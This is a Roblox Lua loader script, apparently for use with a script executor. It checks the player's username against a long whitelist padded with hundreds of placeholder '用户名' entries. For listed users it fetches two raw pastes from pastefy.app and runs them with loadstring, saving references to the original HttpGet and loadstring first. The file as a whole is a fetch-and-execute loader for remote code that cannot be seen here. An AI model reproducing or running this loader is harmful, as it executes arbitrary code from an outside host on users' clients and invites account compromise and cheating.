local originalLoadstring = loadstring
local originalHttpGet = game.HttpGet

local WhitelistedUsernames = {
    "CN_bfsm",
    "12auiopasdf",
    "xinhao9178",
    "qwertty_471",
    "woshiguoren_1",
    "qazplmy456",
    "datzem5",
    "yy88889999",
    "123auiopasdf9",
    "azlm943",
    "JohnWrightMAX6",
    "HANXU_6",
    "yinsel4gyepin",
    "164694M",
    "164694ks2",
    "lhahaoyuUxx",
    "hslp639",
    "HuanChen07",
    "yffhyfhfcgcvh9",
    "qwertyuasdfghj585",
    "azurelatch",
    "laoda_manman",
    "china_ren13",
    "ALAK202510",
    "SBoppoA5bro11457891",
    "qp11047",
    "jeje6164",
    "QAAQQQAAQm",
    "9178r1",
    "yuanzikun4",
    "riversmio",
    "114514haosz",
    "ggFiserlost",
    "sanb1919810",
    "1bro481",
    "RY780780",
    "hshshsgsv04",
    "wokan91",
    "vegeta541886",
    "jdkdkdkdkdkd587",
    "YYY_AAC",
    "131xne",
    "tckkbf",
    "gfsfhjjnb",
    "11234cgr",
    "tvsgrbrvdv",
    "qwe_q56",
    "zxcvbnmq059",
    "HANXU198",
    "11451419180A5",
    "BXG081",
    "zzyq789",
    "yydswaso",
    "rgrfd11",
    "CN_SNSNSN",
    "tian6666hao",
    "qazplmy6789",
    "wcnmlgbdsbd",
    "xian_zhen9178",
    "114514rrr9178",
    "JDJXBDJDKSLAL",
    "djskwjoo",
    "dhzuoak2",
    "rt78002091",
    "HANXU91",
    "djdjfkfirkdnx",
    "qazplmy12345",
    "lmngb191",
    "sanb1919810",
    "fwfwfwfwfwfwfwfwas",
    "giaogedalb",
    "111iii577",
    "wjj133226868604",
    "youtwuwb",
    "azlm943",
    "XXS1238082",
    "wzc1892893",
    "xiaonailao12",
    "988168Kk",
    "gjbakerli406",
    "China_YYDS9",
    "12345SSDLH222222",
    "zxcv_seoi",
    "qwetty32",
    "GOD_PLAYSHOW",
    "xiaoping_75",
    "SHENcoke",
    "lhahaoyuUxx",
    "china_YYDS9",
    "ALAK20258",
    "0012gf",
    "12313023OSDKKX",
    "qawsedrftgygujij95",
    "hrvwud",
    "67676778djhxx",
    "ALAK202513",
    "jfjfkdkjdjf521",
    "XTXTXT648",
    "HXB201111",
    "hr1237k",
    "JohnWrightMAX",
    "ucjgxbhhc",
    "wanjiaQC",
    "Km_known001",
    "Woepsa2",
    "woepsa20",
    "ww3470861850zzf",
    "wzzf3470861850",
    "tyhnhx",
    "qweiop666666666",
    "xin_hai114514",
    "36hsoqrbdjbd",
    "rgrfd4646",
    "shdhudgwu",
    "sanb114599",
    "mjqssb",
    "114514dsb51",
    "VLK926",
    "36hsoqrbdjdb36",
    "xgdfhut6",
    "cxcb_880",
    "reborn_666999",
    "fxcbih",
    "chnbhro",
    "xdzy",
    "myrt865h",
    "XDAXC1314",
    "用户名",
    "usuaj64",
    "wio966",
    "wseeerdx",
    "mmmnnnbbb046",
    "SCGPLM999",
    "RuiNaqwp",
    "hertesp89",
    "txhkdy",
    "用户名",
    "CN_HUOSHAN",
    "lmboy3",
    "用户名",
    "zy_h777",
    "sun_ruoxi9162",
    "werqpszx",
    "用户名",
    "用户名",
    "ooooopooooio",
    "laoda1472",
    "857XP4",
    "greenbag119",
    "CN_BLPO",
    "用户名",
    "SCGPLM666",
    "6666dhshdh",
    "liu123654",
    "7855786",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "dxcfdxcf133",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "wczhishigui",
    "Miss_lol540",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "jhjyfhts",
    "用户名",
    "Couhdud",
    "lmboy08",
    "gtrvgefcc15",
    "用户名",
    "JJDIDDOX",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "6tTPvNhfzR4",
    "notnullimnull1",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "hdbdjsnh",
    "sanb114598",
    "aqokdhd2025",
    "HXB20111",
    "HXB201111",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "CN_guweie",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "agoodboy612",
    "rgrfd466666",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "ZXCVBN7891",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
        "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
        "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "用户名",
    "Aoode1111"
}

local urls = {
    "https://pastefy.app/RsgpSoh0/raw",
    "https://pastefy.app/7NRuXg98/raw"
}

local function isUsernameValid()
    local playerName = tostring(game.Players.LocalPlayer.Name)
    for _, username in ipairs(WhitelistedUsernames) do
        if playerName == username then
            return true
        end
    end
    return false
end

local function loadScripts()
    if not isUsernameValid() then
        return
    end

    for _, url in ipairs(urls) do
        local success, content = pcall(originalHttpGet, game, url)
        if success then
            local func, err = originalLoadstring(content)
            if func and type(func) == "function" then
                local execSuccess, execResult = pcall(func)
            end
        end
    end
end

loadScripts()
